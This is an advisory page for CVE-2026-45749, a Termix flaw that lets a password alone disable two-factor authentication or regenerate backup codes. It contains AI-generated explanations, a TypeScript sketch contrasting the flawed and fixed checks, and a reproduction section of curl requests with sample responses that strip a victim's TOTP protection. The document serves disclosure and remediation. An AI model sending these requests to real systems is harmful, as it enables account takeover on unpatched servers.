VYPR
High severity 8.1 · NVD Advisory · Published Jun 5, 2026 · Updated Jun 5, 2026

CVE-2026-45749

Description

Termix versions prior to 2.3.2 allow disabling MFA or regenerating backup codes using only a user's password, bypassing two-factor authentication.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Termix, a web-based server management platform, contains a vulnerability in its POST /users/totp/disable and POST /users/totp/backup-codes endpoints. Versions prior to 2.3.2 incorrectly accept the account password as the sole authentication factor for these critical multi-factor authentication (MFA) operations. The vulnerability resides in src/backend/database/routes/users.ts [1].

Exploitation

An attacker who has obtained a user's password, through methods such as phishing or credential stuffing, can exploit this vulnerability. The attacker needs only the user's password and network access to the Termix platform. By sending a POST request to either the /users/totp/disable or /users/totp/backup-codes endpoint with the user's password, the attacker can proceed without needing the user's TOTP device or a valid TOTP code [1].

Impact

Successful exploitation allows an attacker to completely disable Two-Factor Authentication (2FA) for a user or regenerate their backup codes, thereby invalidating previous codes. This effectively renders the MFA protection useless, granting the attacker the same access and privileges as the compromised user without requiring the second factor of authentication [1].

Mitigation

Termix version 2.3.2 addresses this vulnerability. Users are strongly advised to update to version 2.3.2 or later. No workarounds are specified, and the vulnerability is not listed as being part of the Known Exploited Vulnerabilities (KEV) catalog at this time [2].

AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Termix SSH/Termix (2 versions)
    • (no CPE)
    • (no CPE), range: <2.3.2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `POST /users/totp/disable` and `POST /users/totp/backup-codes` endpoints incorrectly accept only the user's password as sufficient authentication for critical MFA operations."

Attack vector

An attacker who obtains a user's password can exploit this vulnerability. The attacker sends a POST request to either the `/users/totp/disable` or `/users/totp/backup-codes` endpoint, providing only the victim's password in the request body. This bypasses the need for a valid TOTP code or possession of the TOTP device, allowing the attacker to disable two-factor authentication or regenerate backup codes. [1]

Affected code

The vulnerability resides in the `src/backend/database/routes/users.ts` file, specifically within the `POST /users/totp/disable` (lines 3076–3133) and `POST /users/totp/backup-codes` (lines 3167–3219) route handlers. These sections contain logic that accepts a password as a sole authentication factor for disabling TOTP or regenerating backup codes. [1]

What the fix does

Version 2.3.2 modifies the authentication logic for sensitive endpoints. Previously, the application would accept either a password or a TOTP code. The fix enforces that both a password and a valid TOTP code must be provided when TOTP is enabled to disable it or regenerate backup codes. This ensures that an attacker cannot bypass MFA using only the compromised password. [1]
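The difference between the two authorization policies described above, as an added example that is not Termix source code. All type, function and field names, the HTTP status codes, and the sample password and TOTP values are assumptions made for illustration; the password and TOTP verifiers are injected so the policy can be read on its own.

```typescript
// Added illustration; every name here is hypothetical, not Termix source code.
type Verifier = (userId: string, value: string) => boolean;

interface MfaChangeRequest {
  userId: string;
  totpEnabled: boolean; // account state loaded server-side, never from the body
  password?: string;    // request body field
  totpCode?: string;    // request body field
}

// HTTP status codes are an assumption of this example.
interface Decision { allowed: boolean; status: number; reason: string }

const deny = (status: number, reason: string): Decision => ({ allowed: false, status, reason });
const ALLOW: Decision = { allowed: true, status: 200, reason: "ok" };

// Pre-2.3.2 behaviour as the advisory describes it: either factor is enough,
// so a stolen password alone authorizes the MFA change.
function authorizeEitherFactor(req: MfaChangeRequest, checkPassword: Verifier, checkTotp: Verifier): Decision {
  const passwordOk = req.password !== undefined && checkPassword(req.userId, req.password);
  const totpOk = req.totpCode !== undefined && checkTotp(req.userId, req.totpCode);
  return passwordOk || totpOk ? ALLOW : deny(401, "invalid credentials");
}

// Behaviour the fix enforces: with TOTP enabled, both factors must be present and valid.
function authorizeBothFactors(req: MfaChangeRequest, checkPassword: Verifier, checkTotp: Verifier): Decision {
  if (!req.totpEnabled) return deny(400, "TOTP is not enabled");
  if (!req.password || !req.totpCode) return deny(400, "password and TOTP code are both required");
  // Evaluate both checks before deciding so the reply does not reveal which one failed.
  const passwordOk = checkPassword(req.userId, req.password);
  const totpOk = checkTotp(req.userId, req.totpCode);
  return passwordOk && totpOk ? ALLOW : deny(401, "invalid credentials");
}

// Constructed verifiers and request bodies for the demonstration.
const checkPassword: Verifier = (_id, pw) => pw === "constructed-password";
const checkTotp: Verifier = (_id, code) => code === "000000";
const passwordOnly: MfaChangeRequest = { userId: "u1", totpEnabled: true, password: "constructed-password" };
const bothFactors: MfaChangeRequest = { ...passwordOnly, totpCode: "000000" };

function demo(): boolean[] {
  return [
    authorizeEitherFactor(passwordOnly, checkPassword, checkTotp).allowed, // true
    authorizeBothFactors(passwordOnly, checkPassword, checkTotp).allowed,  // false
    authorizeBothFactors(bothFactors, checkPassword, checkTotp).allowed,   // true
  ];
}
```

A regression test for an upgraded deployment can assert the same three outcomes against the two endpoints.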

Preconditions

  • auth: The attacker must know the victim user's password. [1]
  • config: The victim user must have TOTP two-factor authentication enabled. [1]

Reproduction

# Attack 1: Disable TOTP with password only

```bash
# Confirm TOTP is currently enabled
curl -s -b cookies.txt http://<TERMIX_HOST>:30001/users/me
# {"userId":"...","username":"victim_mfa","totp_enabled":true}

# Disable TOTP — only the password, no TOTP code
curl -s -b cookies.txt -X POST http://<TERMIX_HOST>:30001/users/totp/disable \
  -H "Content-Type: application/json" \
  -d '{"password":"V1ctim!Secure"}'
# {"message":"TOTP disabled successfully"}

# Confirm TOTP is now disabled
curl -s -b cookies.txt http://<TERMIX_HOST>:30001/users/me
# {"userId":"...","username":"victim_mfa","totp_enabled":false}

# Login again — no TOTP prompt, full access
curl -s -X POST http://<TERMIX_HOST>:30001/users/login \
  -H "Content-Type: application/json" \
  -d '{"username":"victim_mfa","password":"V1ctim!Secure"}'
# {"success":true,"is_admin":false,"username":"victim_mfa"}
```

# Attack 2: Regenerate backup codes with password only

```bash
# With a valid session and TOTP enabled:
curl -s -b cookies.txt -X POST http://<TERMIX_HOST>:30001/users/totp/backup-codes \
  -H "Content-Type: application/json" \
  -d '{"password":"V1ctim!Secure"}'
# {"backup_codes":["65S6YXGA","K79NBYYZ","NPWPLBVI",...]}}
```

[1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2
